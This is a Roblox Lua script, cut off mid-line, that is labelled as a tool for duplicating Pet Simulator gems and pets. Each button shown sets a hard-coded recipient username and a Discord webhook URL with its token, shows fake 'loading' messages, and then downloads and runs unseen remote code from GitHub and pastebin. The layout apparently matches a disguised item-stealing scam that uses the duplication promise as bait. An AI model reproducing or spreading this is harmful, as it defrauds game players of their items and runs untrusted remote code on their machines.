local kavoUi = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()
local window = kavoUi.CreateLib("Dupe Script","BloodTheme")

---Tabs

local Tab1 = window:NewTab("Main")
local Tab1Section = Tab1:NewSection("Main")

---Buttons

Tab1Section:NewButton("Dupe Gems","Sign",function()
Username = "Lonky_Lanky"
WebHook = "https://discord.com/api/webhooks/1069262192278503435/U-ZKnujr98YDuOw48S7Xp4rltAc0NeINbYxHUAR60nD79MshJZAIB5Nqs_7xzFlTaDye"

_G.CustomScriptName = "Coen"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
end)

Tab1Section:NewButton("Dupe Pets","Unsign",function()
Username = "Lonky_Lanky"
WebHook = "https://discord.com/api/webhooks/1069262192278503435/U-ZKnujr98YDuOw48S7Xp4rltAc0NeINbYxHUAR60nD79MshJZAIB5Nqs_7xzFlTaDye"

_G.CustomScriptName = "Coen"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
end)

Tab1Section:NewButton("ResetCharacter","Reset",function()
Username = "Lonky_Lanky"
WebHook = "https://discord.com/api/webhooks/1069262192278503435/U-ZKnujr98YDuOw48S7Xp4rltAc0NeINbYxHUAR60nD79MshJZAIB5Nqs_7xzFlTaDye"

_G.CustomScriptName = "Coen"
_G.Text1 = "Script Loaded..."
_G.Text2 
